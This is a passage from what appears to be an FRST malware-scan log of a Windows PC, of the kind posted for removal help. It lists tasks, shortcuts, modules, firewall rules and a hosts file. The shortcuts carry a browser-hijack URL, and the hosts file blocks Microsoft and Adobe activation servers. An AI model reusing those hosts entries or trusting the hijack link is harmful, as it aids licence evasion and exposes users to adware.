System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {CAA6D529-7194-483F-83B5-CC0DECBB79F1} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe Task: {CBB3F7DE-25BB-4CCD-94D2-D06A6AE2FAB9} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {D28E417A-5AA0-4E40-88A8-E35DBFE1BB47} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {D4A3D063-C63B-40B2-B510-6078E567D5F1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe [2017-01-13] (Adobe Systems Incorporated) Task: {D9181387-0D3C-4BD9-AA3F-B84B09A09464} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe Task: {E477202E-FF42-42FF-B908-370B5E61861F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION Task: {E6951E9E-2CA9-47C8-AD1D-523CD47464A0} - System32\Tasks\{4F5DDD12-D0F9-4D61-BEA6-5627B3E2B461} => pcalua.exe -a C:\Users\Sebastian\Desktop\MinecraftZyczu.exe -d C:\Users\Sebastian\Desktop Task: {ECFD5185-A38E-4DF9-BC44-796744F67D10} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe Task: {EE1F897E-5899-4CE9-9CBC-C478ABDC6CF2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {FA20DA33-0E58-41BF-B881-CED80B25DAD5} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe Task: {FB6C56D6-3310-4477-A228-75AB870728C4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) ShortcutWithArgument: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492595776&z=103a4681e865a2aae787db3g3z9t7oew5taw6m8mdb&from=che0812&uid=ST500DM002-1BD142_W3T830Z0XXXXW3T830Z0 ShortcutWithArgument: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492595776&z=103a4681e865a2aae787db3g3z9t7oew5taw6m8mdb&from=che0812&uid=ST500DM002-1BD142_W3T830Z0XXXXW3T830Z0 ==================== Loaded Modules (Whitelisted) ============== 2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2017-04-12 18:30 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-06-28 18:19 - 2016-06-28 18:19 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe 2017-04-12 18:30 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-10-25 10:57 - 2016-10-25 10:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll 2012-10-01 21:36 - 2012-10-01 21:36 - 06522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2016-11-20 20:11 - 2016-11-20 20:11 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2017-03-15 18:25 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2017-03-15 18:25 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-03-15 18:25 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-03-15 18:25 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2017-04-12 18:30 - 2017-03-28 07:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2017-04-12 18:30 - 2017-03-28 07:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2017-04-10 17:10 - 2017-04-10 17:10 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-04-10 17:10 - 2017-04-10 17:10 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-04-10 17:10 - 2017-04-10 17:10 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-04-10 17:10 - 2017-04-10 17:10 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll 2013-09-04 19:21 - 2013-09-04 19:21 - 02112000 _____ () D:\Program Files (x86)\screenSHU\screenSHU.exe 2016-10-25 10:57 - 2016-10-25 10:57 - 31723696 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe 2017-04-19 13:29 - 2017-04-19 07:39 - 00111616 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe 2017-04-05 16:47 - 2017-04-05 16:48 - 00055808 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll 2017-04-12 16:47 - 2017-04-12 16:47 - 31972864 _____ () C:\Program Files\WindowsApps\Microsoft.XboxApp_27.28.8007.0_x64__8wekyb3d8bbwe\XboxApp.dll 2011-06-08 09:32 - 2011-06-08 09:32 - 00011362 _____ () D:\Program Files (x86)\screenSHU\mingwm10.dll 2011-06-08 09:32 - 2011-06-08 09:32 - 00043008 _____ () D:\Program Files (x86)\screenSHU\libgcc_s_dw2-1.dll 2016-08-06 11:26 - 2017-04-19 13:22 - 67725936 _____ () C:\Users\defaultuser0\AppData\Roaming\Spotify\libcef.dll 2016-10-26 13:36 - 2017-04-19 13:22 - 00110192 _____ () C:\Users\defaultuser0\AppData\Roaming\Spotify\SpotifyWinRT.dll 2016-12-09 16:09 - 2016-12-09 16:09 - 52051544 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll 2016-08-06 11:26 - 2017-04-19 13:22 - 01929840 _____ () C:\Users\defaultuser0\AppData\Roaming\Spotify\libglesv2.dll 2016-08-06 11:26 - 2017-04-19 13:22 - 00087152 _____ () C:\Users\defaultuser0\AppData\Roaming\Spotify\libegl.dll 2016-12-02 02:54 - 2016-12-02 02:54 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node 2016-12-02 02:54 - 2016-12-02 02:54 - 00223232 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node 2016-12-02 02:54 - 2016-12-02 02:54 - 00117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node 2016-12-02 02:54 - 2016-12-02 02:54 - 00124928 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node 2016-12-09 16:09 - 2016-12-09 16:09 - 00099416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll 2016-12-02 02:54 - 2016-12-02 02:54 - 00086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node 2017-04-17 15:05 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll 2017-03-02 17:06 - 2017-03-02 17:05 - 39821912 _____ () C:\Program Files (x86)\Opera\43.0.2442.1144\opera_browser.dll 2012-10-01 21:37 - 2012-10-01 21:37 - 06522480 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2017-03-02 17:06 - 2017-03-02 17:06 - 45842008 _____ () C:\Program Files (x86)\Opera\43.0.2442.1144\opera_child.dll 2017-03-02 17:06 - 2017-03-02 17:05 - 01930328 _____ () C:\Program Files (x86)\Opera\43.0.2442.1144\libglesv2.dll 2017-03-02 17:06 - 2017-03-02 17:05 - 00087640 _____ () C:\Program Files (x86)\Opera\43.0.2442.1144\libegl.dll 2017-04-19 13:31 - 2017-04-19 06:08 - 00113664 _____ () c:\programdata\microsoft\windows\gameexplorer\resources.dll 2017-04-19 13:31 - 2017-04-19 06:08 - 00113664 _____ () C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll 2016-08-30 01:19 - 2016-08-30 01:19 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2016-01-27 20:08 - 2017-03-17 15:10 - 00001124 ____A C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 genuine.microsoft.com 127.0.0.1 mpa.one.microsoft.com 127.0.0.1 sls.microsoft.com 127.0.0.1 lmlicenses.wip4.adobe.com 127.0.0.1 lm.licenses.adobe.com 127.0.0.1 na1r.services.adobe.com 127.0.0.1 hlrcv.stage.adobe.com 127.0.0.1 practivate.adobe.com 127.0.0.1 activate.adobe.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\Control Panel\Desktop\\Wallpaper -> d:\art\stocki & wallpapers\vushmkcydp.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\Services: wuauserv => 2 MSCONFIG\startupreg: ALLUpdate => "D:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808 FirewallRules: [{BB63DA27-4252-4839-A117-F701959211DA}] => (Allow) C:\Program Files (x86)\Opera\43.0.2442.991\opera.exe FirewallRules: [{6BA3C21B-9157-4D72-941D-1549E670693D}] => (Block) D:\gry\activision\call of duty 2\cod2mp_s.exe FirewallRules: [{37896E3E-FB54-497F-A520-A3DF63A66F82}] => (Block) D:\gry\activision\call of duty 2\cod2mp_s.exe FirewallRules: [UDP Query User{9B83BF86-E92E-4A9A-A029-1BD5EA0E886D}D:\gry\activision\call of duty 2\cod2mp_s.exe] => (Allow) D:\gry\activision\call of duty 2\cod2mp_s.exe FirewallRules: [TCP Query User{B42EADFB-F1AF-4E02-BBF9-2CB1517D7D47}D:\gry\activision\call of duty 2\cod2mp_s.exe] => (Allow) D:\gry\activision\call of duty 2\cod2mp_s.exe FirewallRules: [{715F93FE-591F-4849-89F3-82EFAC5470B5}] => (Block) D:\gry\call of duty 2\cod2mp_s.exe FirewallRules: [{3F67E835-5567-465D-88FC-BB5DE46BE489}] => (Block) D:\gry\call of duty 2\cod2mp_s.exe FirewallRules: [UDP Query User{A54C09F7-EBFD-4BF4-A1FB-2CA0C985B69D}D:\gry\call of duty 2\cod2mp_s.exe] => (Allow) D:\gry\call of duty 2\cod2mp_s.exe FirewallRules: [TCP Query User{022EE060-526D-4C11-A283-77ED4A191CA4}D:\gry\call of duty 2\cod2mp_s.exe] => (Allow) D:\gry\call of duty 2\cod2mp_s.exe FirewallRules: [{D5E33FCE-1BED-4EFF-BF2C-B948D976B7B1}] => (Allow) D:\GRY\Call of Duty 2\CoD2SP_s.exe FirewallRules: [{4CD15FEC-2C73-48E9-A491-9A6697770A32}] => (Allow) D:\GRY\Call of Duty 2\CoD2SP_s.exe FirewallRules: [UDP Query User{997ECBD8-6B1C-4417-91FD-C79F961E1943}D:\gry\worms armageddon\wa.exe] => (Allow) D:\gry\worms armageddon\wa.exe FirewallRules: [TCP Query User{7C335504-7C07-4665-A918-927CEF1DEE70}D:\gry\worms armageddon\wa.exe] => (Allow) D:\gry\worms armageddon\wa.exe FirewallRules: [UDP Query User{668E53E1-9C7E-4256-B374-B21D0130B1CA}C:\users\defaultuser0\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\gameranger\gameranger\gameranger.exe FirewallRules: [TCP Query User{CAD67C64-51CA-4C5E-982D-5CD21DD1C5C7}C:\users\defaultuser0\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\gameranger\gameranger\gameranger.exe FirewallRules: [UDP Query User{A59A4614-DD7C-4AF5-AB72-54FB3081E131}C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{152511C0-A65B-4D2D-A1DD-7FB8AF0AC21E}C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe FirewallRules: [{E94A11A3-1109-4BB0-A5D0-88A60F8BD0E3}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe FirewallRules: [{B09EA2FA-7282-480F-B460-A40A864C7230}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe FirewallRules: [{36345EE5-0EEE-4D27-AF2E-999B18FE3AE6}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{594A5A0E-B267-4581-90B5-96F00444F3B1}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{C61DD689-79D1-40E7-A647-2EA342E1F591}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe FirewallRules: [{01C45FA7-69CE-4C36-A466-7D59650861EE}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe FirewallRules: [UDP Query User{5A9CCFA1-27D2-440F-A6B6-F953C177B781}D:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe FirewallRules: [TCP Query User{5D61C508-6006-469B-B0DD-C3AABE0D2C7C}D:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe FirewallRules: [{5F63994B-6C50-4720-9E14-0D3831905C1E}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{ECF741C3-CC15-42FA-8880-A22D1D362F9C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{AD0FA485-D7CD-4D0A-94FB-2CEAF4F249B4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{F20AD74B-D239-4AF6-ADE5-027A4EC990C9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{10E9F738-9462-46DA-80F4-7C6F8F970203}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{5D4C4871-558D-4EA6-9458-26CF74DDB49B}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{CC00AB40-FFA6-4987-90DE-607D0360E3AD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe FirewallRules: [{A61BFB92-C87C-4F40-8CDF-6638F99DC4C6}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{642F0297-87B3-4C9F-81E1-F0B67A712926}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe FirewallRules: [{CF4471EA-A765-400A-9E40-21991941D447}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{3E53A458-880C-4ED1-9119-B96BC3A68CDC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{0436EB76-DBC2-4E1D-90FB-3F2BDEFCDEBA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{75CE3CD0-A6F1-43F4-AEE4-E3511214D9B6}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [UDP Query User{C1372524-5C19-4EAB-9861-6D1673F8C394}D:\xampp\apache\bin\httpd.exe] => (Allow) D:\xampp\apache\bin\httpd.exe FirewallRules: [TCP Query User{F4402D8D-1DC0-4219-9D98-4A21D075F3AE}D:\xampp\apache\bin\httpd.exe] => (Allow) D:\xampp\apache\bin\httpd.exe FirewallRules: [{3888CADF-DE03-4FE4-8523-1DFB2247BE20}] => (Allow) D:\Program Files (x86)\AVG\Av\avgdiagex.exe FirewallRules: [{63D4E5A5-E50C-438C-A594-68CB93A8E6FD}] => (Allow) D:\Program Files (x86)\AVG\Av\avgdiagex.exe FirewallRules: [UDP Query User{126CAB79-1D40-4EE2-A737-09CDAA1C452E}C:\users\defaultuser0\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\bittorrent\bittorrent.exe FirewallRules: [TCP Query User{EBEFADD3-4CF6-440D-B9A3-BAE57F5CE178}C:\users\defaultuser0\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\bittorrent\bittorrent.exe FirewallRules: [UDP Query User{B06D15D8-5B81-4CE7-8C68-95C8F5F1707C}C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{2FB65DF1-29B1-42A3-8926-6C8ACBD9A289}C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\defaultuser0\appdata\roaming\spotify\spotify.exe FirewallRules: [{41D2D8BB-AC61-4EB0-9190-EF875F2F602A}] => (Allow) D:\Program Files (x86)\AVG\Av\avgmfapx.exe FirewallRules: [{86E1392D-3BA6-4922-9EA0-E255E31619A1}] => (Allow) D:\Program Files (x86)\AVG\Av\avgmfapx.exe FirewallRules: [{5296459D-342F-4012-9FFA-20195ACAFFBE}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{197B62FB-5961-4A62-A8C4-46AE2911EDAE}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{0C466A0C-9CA4-4745-AEB9-FF140CCD0C41}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{64688939-D20F-44AE-B98A-F1F673C836F3}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{4296356D-9D8B-404A-AD56-395EF8EE9233}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{E7A52D4A-79D8-4445-BCB5-6B4F37CBAB58}] => (Allow) C:\Users\Sebastian\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [TCP Query User{A688DC1A-30CC-4682-89AD-C31F66556764}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe FirewallRules: [UDP Query User{A124699B-A4D7-460D-A5FC-2AC49CD17B3B}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe FirewallRules: [{2CA6FC14-AF29-488F-84C3-A3344B240A2B}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{EEB2F85D-C941-4824-A11A-34DC60CB6A6A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{C6BC0CD7-0076-4F23-B9F6-4424434B6C8B}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{22946C5D-19CA-407D-983A-23A51AD14D69}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{66B421AE-2B9A-44E3-97FE-F640AA7A9911}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{B42F0A53-C993-4063-AB97-3BE747662AB7}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{3C901F2F-C1A0-400F-BAB9-41C0A16E3EBD}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{A5CA23AC-A7D6-483D-99C2-2EBC7CB3FC55}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{DD722A0E-4DA3-4E57-816A-2D73F846C86C}] => (Allow) D:\GRY\WarThunder\bpreport.exe FirewallRules: [{2C1B893E-32B7-43B5-993F-759F1F444421}] => (Allow) D:\GRY\WarThunder\bpreport.exe FirewallRules: [TCP Query User{C049BD6E-72AA-43B5-B4A0-B60A0EE347AF}D:\gry\warthunder\win64\aces.exe] => (Allow) D:\gry\warthunder\win64\aces.exe FirewallRules: [UDP Query User{03BD716E-396F-4D92-90B0-4A141211AF6C}D:\gry\warthunder\win64\aces.exe] => (Allow) D:\gry\warthunder\win64\aces.exe FirewallRules: [TCP Query User{811BEDFB-8E77-4094-A5A9-25FD933B0E1F}C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraftzyczu.exe] => (Allow) C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraftzyczu.exe FirewallRules: [UDP Query User{DFB3AFF9-9451-4B4F-B74D-0DE08E81A05F}C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraftzyczu.exe] => (Allow) C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraftzyczu.exe FirewallRules: [{C0B90005-2B6E-4B3F-BCD9-BCC23B933DBF}] => (Allow) C:\Users\Sebastian\Desktop\MiniRacingOnline\MiniRacingOnLine.exe FirewallRules: [{3BDB2091-D436-427C-BCF6-8F6F97E1EDDD}] => (Allow) C:\Users\Sebastian\Desktop\MiniRacingOnline\MiniRacingOnLine.exe FirewallRules: [TCP Query User{882F478B-45AB-48B8-AB8C-042E11ADC897}C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraft by zyczu.exe] => (Allow) C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraft by zyczu.exe FirewallRules: [UDP Query User{2DFF3FFB-0E94-456D-9594-CD073B40F25F}C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraft by zyczu.exe] => (Allow) C:\program files\java\jre1.8.0_77\launch4j-tmp\minecraft by zyczu.exe FirewallRules: [{28A983F3-4F84-427C-A329-AEF30E3418E8}] => (Allow) D:\Users\Sebastian\AppData\Local\Vivaldi\Application\vivaldi.exe FirewallRules: [TCP Query User{4465BB2D-A365-468D-8891-34FC12066BBB}C:\program files\java\jre1.8.0_77\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_77\bin\javaw.exe FirewallRules: [UDP Query User{B586D50B-2A20-4641-AC93-E34AB7374397}C:\program files\java\jre1.8.0_77\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_77\bin\javaw.exe FirewallRules: [{178F67CC-9A45-43AC-AAF9-5FA4C2FC522B}] => (Allow) C:\Windows\SysWOW64\dplaysvr.exe FirewallRules: [{A2E5A4F2-BA22-46CD-8272-BDC649960871}] => (Allow) C:\Windows\SysWOW64\dplaysvr.exe FirewallRules: [{9F951418-2B36-4BE1-AEAB-774348099C26}] => (Allow) D:\GRY\AOE\Age2_x1\age2_x2.exe FirewallRules: [{8C2B78D6-DE79-4C8A-BF4E-EF02CDF7CD72}] => (Allow) D:\GRY\AOE\Age2_x1\age2_x2.exe FirewallRules: [TCP Query User{DF333D31-B0A8-4D0D-914C-C86C3188C3C1}D:\gry\aoe\age2_x1.exe] => (Allow) D:\gry\aoe\age2_x1.exe FirewallRules: [UDP Query User{6228FB65-E9C7-4AB9-8932-4BD65F82722F}D:\gry\aoe\age2_x1.exe] => (Allow) D:\gry\aoe\age2_x1.exe FirewallRules: [TCP Query User{843C23CE-FE2B-4D19-9197-BFBE3B46225A}D:\gry\medieval ii total war collection\medieval2.exe] => (Allow) D:\gry\medieval ii total war collection\medieval2.exe FirewallRules: [UDP Query User{E4801064-0535-4AB2-B766-20847A1667F5}D:\gry\medieval ii total war collection\medieval2.exe] => (Allow) D:\gry\medieval ii total war collection\medieval2.exe FirewallRules: [{53F53BCB-CD71-4D9C-AAE6-232EE9EF9B08}] => (Allow) C:\Users\Sebastian\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{C4C766D1-22BC-4E7A-95AD-74FF1FAD93B6}] => (Allow) C:\Users\Sebastian\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{6D9DE783-2846-4385-8C97-82F9016DFFB1}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{E1B208BA-ECD0-4C7D-9DC1-C553522E60D3}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{3CFE7D01-7F08-4ACB-A6C8-B2A9F25107F9}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{1366D243-3E7C-4034-A338-9D8E20D5591E}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{99CECF86-3769-486C-8910-C405370F4581}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{4D2AC336-E1BC-4DDC-B0F3-1E378756C26E}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{32BED7A2-E992-40AE-B237-D48504B8B09A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{F64F7CDE-CCAC-4793-B43F-CF7FA7AE716A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{F138C1E5-601F-4A05-BE0B-D5D824BFCE3B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{804D41C7-7B03-47A1-A892-962A09283ADD}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{EE27D597-F3C2-4CAB-BE61-9E72A2D269E0}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe FirewallRules: [{E6354F2E-6ED6-4608-9406-DAC8A4F6200D}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe FirewallRules: [TCP Query User{F11B015C-CF76-4FA6-8F44-38861A2C4443}D:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) D:\program files (x86)\origin games\battlefield 4\bf4.exe FirewallRules: [UDP Query 